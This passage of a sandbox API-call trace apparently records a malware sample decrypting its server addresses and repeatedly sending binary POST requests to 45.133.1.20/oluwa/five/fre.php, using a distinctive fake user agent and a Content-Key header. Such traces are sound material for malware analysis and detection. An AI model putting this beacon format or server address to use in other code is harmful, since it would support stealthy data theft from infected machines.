HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0317.672] GetProcessHeap () returned 0x6a0000 [0317.672] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6df628 [0317.672] GetProcessHeap () returned 0x6a0000 [0317.672] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0317.673] GetProcessHeap () returned 0x6a0000 [0317.673] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0317.673] GetProcessHeap () returned 0x6a0000 [0317.673] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dff48 [0317.674] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0317.675] wvsprintfA (in: param_1=0x6dff48, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0317.675] GetProcessHeap () returned 0x6a0000 [0317.675] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0317.675] GetProcessHeap () returned 0x6a0000 [0317.675] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0317.676] send (s=0xc3c, buf=0x6bd460*, len=242, flags=0) returned 242 [0317.676] send (s=0xc3c, buf=0x6bb998*, len=159, flags=0) returned 159 [0317.677] GetProcessHeap () returned 0x6a0000 [0317.677] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6da320 [0317.677] recv (in: s=0xc3c, buf=0x6da320, len=4048, flags=0 | out: buf=0x6da320*) returned 204 [0317.753] GetProcessHeap () returned 0x6a0000 [0317.754] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0317.754] GetProcessHeap () returned 0x6a0000 [0317.754] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0317.755] GetProcessHeap () returned 0x6a0000 [0317.756] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6df628 | out: hHeap=0x6a0000) returned 1 [0317.756] GetProcessHeap () returned 0x6a0000 [0317.756] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf278 | out: hHeap=0x6a0000) returned 1 [0317.756] closesocket (s=0xc3c) returned 0 [0317.757] GetProcessHeap () returned 0x6a0000 [0317.757] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baad0 | out: hHeap=0x6a0000) returned 1 [0317.757] GetProcessHeap () returned 0x6a0000 [0317.757] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0317.757] GetProcessHeap () returned 0x6a0000 [0317.758] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0317.758] GetProcessHeap () returned 0x6a0000 [0317.758] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0317.758] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6da320, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x19a4) returned 0xc3c [0317.761] Sleep (dwMilliseconds=0xea60) [0317.763] GetProcessHeap () returned 0x6a0000 [0317.763] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0317.764] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0317.764] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0317.772] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0317.773] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0317.782] GetProcessHeap () returned 0x6a0000 [0317.782] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6d8508 [0317.784] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0317.784] CryptImportKey (in: hProv=0x6bef48, pbData=0x6d8508, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0317.785] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0317.785] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0317.786] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0317.787] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0317.787] GetProcessHeap () returned 0x6a0000 [0317.787] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8508 | out: hHeap=0x6a0000) returned 1 [0317.788] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0317.788] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0317.792] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0317.792] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0317.793] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0317.794] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0317.794] GetProcessHeap () returned 0x6a0000 [0317.794] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0317.795] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0317.795] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0317.796] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0317.796] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0317.797] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0317.797] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0317.798] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0317.799] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0317.799] GetProcessHeap () returned 0x6a0000 [0317.799] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0317.799] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0317.799] GetProcessHeap () returned 0x6a0000 [0317.800] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0317.800] GetProcessHeap () returned 0x6a0000 [0317.800] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0317.801] GetProcessHeap () returned 0x6a0000 [0317.801] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0317.801] GetProcessHeap () returned 0x6a0000 [0317.801] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0317.802] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0317.803] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0317.809] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0317.809] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0317.817] GetProcessHeap () returned 0x6a0000 [0317.817] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0317.818] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0317.819] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0317.820] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0317.820] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0317.821] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0317.822] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0317.822] GetProcessHeap () returned 0x6a0000 [0317.822] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0317.823] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0317.824] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0317.825] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0317.826] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0317.826] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0317.827] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0317.827] GetProcessHeap () returned 0x6a0000 [0317.827] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0317.828] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0317.828] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0317.829] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0317.829] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0317.830] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0317.831] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0317.831] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0317.832] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0317.832] GetProcessHeap () returned 0x6a0000 [0317.832] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0317.832] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0317.832] GetProcessHeap () returned 0x6a0000 [0317.832] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9f0 [0317.832] socket (af=2, type=1, protocol=6) returned 0xc40 [0317.833] connect (s=0xc40, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0317.862] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0317.862] GetProcessHeap () returned 0x6a0000 [0317.862] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beb90 [0317.862] GetProcessHeap () returned 0x6a0000 [0317.862] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dff48 [0317.863] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0317.864] wvsprintfA (in: param_1=0x6dff48, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0317.864] GetProcessHeap () returned 0x6a0000 [0317.864] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6df328 [0317.864] GetProcessHeap () returned 0x6a0000 [0317.865] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0317.865] GetProcessHeap () returned 0x6a0000 [0317.865] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0317.865] GetProcessHeap () returned 0x6a0000 [0317.865] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dff48 [0317.866] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0317.867] wvsprintfA (in: param_1=0x6dff48, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0317.867] GetProcessHeap () returned 0x6a0000 [0317.867] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0317.867] GetProcessHeap () returned 0x6a0000 [0317.867] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0317.867] send (s=0xc40, buf=0x6bd460*, len=242, flags=0) returned 242 [0317.868] send (s=0xc40, buf=0x6bb998*, len=159, flags=0) returned 159 [0317.868] GetProcessHeap () returned 0x6a0000 [0317.868] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6da320 [0317.868] recv (in: s=0xc40, buf=0x6da320, len=4048, flags=0 | out: buf=0x6da320*) returned 204 [0317.943] GetProcessHeap () returned 0x6a0000 [0317.943] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0317.944] GetProcessHeap () returned 0x6a0000 [0317.944] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0317.944] GetProcessHeap () returned 0x6a0000 [0317.944] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6df328 | out: hHeap=0x6a0000) returned 1 [0317.944] GetProcessHeap () returned 0x6a0000 [0317.944] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb90 | out: hHeap=0x6a0000) returned 1 [0317.945] closesocket (s=0xc40) returned 0 [0317.945] GetProcessHeap () returned 0x6a0000 [0317.946] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9f0 | out: hHeap=0x6a0000) returned 1 [0317.946] GetProcessHeap () returned 0x6a0000 [0317.946] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0317.946] GetProcessHeap () returned 0x6a0000 [0317.947] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0317.947] GetProcessHeap () returned 0x6a0000 [0317.947] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0317.947] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6da320, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x19a8) returned 0xc40 [0317.949] Sleep (dwMilliseconds=0xea60) [0317.950] GetProcessHeap () returned 0x6a0000 [0317.950] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0317.951] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0317.952] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0317.958] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0317.958] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0317.977] GetProcessHeap () returned 0x6a0000 [0317.977] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0317.978] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0317.978] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0317.979] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0317.979] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0317.980] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0317.980] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0317.980] GetProcessHeap () returned 0x6a0000 [0317.981] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0317.982] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0317.985] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0317.986] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0317.986] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0317.987] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0317.987] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0317.987] GetProcessHeap () returned 0x6a0000 [0317.987] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0317.988] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0317.992] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0317.993] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0317.993] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0317.994] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0317.995] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0317.996] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0317.996] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0317.996] GetProcessHeap () returned 0x6a0000 [0317.996] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0317.996] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0317.996] GetProcessHeap () returned 0x6a0000 [0317.997] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0317.997] GetProcessHeap () returned 0x6a0000 [0317.997] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0317.997] GetProcessHeap () returned 0x6a0000 [0317.998] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0317.998] GetProcessHeap () returned 0x6a0000 [0317.998] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0317.999] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0317.999] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0318.009] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0318.009] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf0e0) returned 1 [0318.020] GetProcessHeap () returned 0x6a0000 [0318.020] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0318.021] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0318.022] CryptImportKey (in: hProv=0x6bf0e0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0318.022] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0318.023] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0318.023] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0318.024] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0318.024] GetProcessHeap () returned 0x6a0000 [0318.024] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0318.026] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0318.029] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0318.030] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0318.030] CryptDestroyKey (hKey=0x6ad020) returned 1 [0318.031] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0318.032] CryptReleaseContext (hProv=0x6bf0e0, dwFlags=0x0) returned 1 [0318.032] GetProcessHeap () returned 0x6a0000 [0318.032] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0318.033] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0318.033] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0318.034] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0318.037] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0318.038] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0318.039] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0318.039] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0318.040] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0318.040] GetProcessHeap () returned 0x6a0000 [0318.040] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0318.040] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0318.040] GetProcessHeap () returned 0x6a0000 [0318.040] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9e0 [0318.040] socket (af=2, type=1, protocol=6) returned 0xc44 [0318.041] connect (s=0xc44, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0318.063] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0318.063] GetProcessHeap () returned 0x6a0000 [0318.063] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0318.063] GetProcessHeap () returned 0x6a0000 [0318.063] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dff48 [0318.064] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0318.065] wvsprintfA (in: param_1=0x6dff48, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0318.065] GetProcessHeap () returned 0x6a0000 [0318.065] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6df4a8 [0318.065] GetProcessHeap () returned 0x6a0000 [0318.065] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0318.066] GetProcessHeap () returned 0x6a0000 [0318.066] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0318.066] GetProcessHeap () returned 0x6a0000 [0318.066] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dff48 [0318.067] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0318.068] wvsprintfA (in: param_1=0x6dff48, param_2="%sContent-Key: 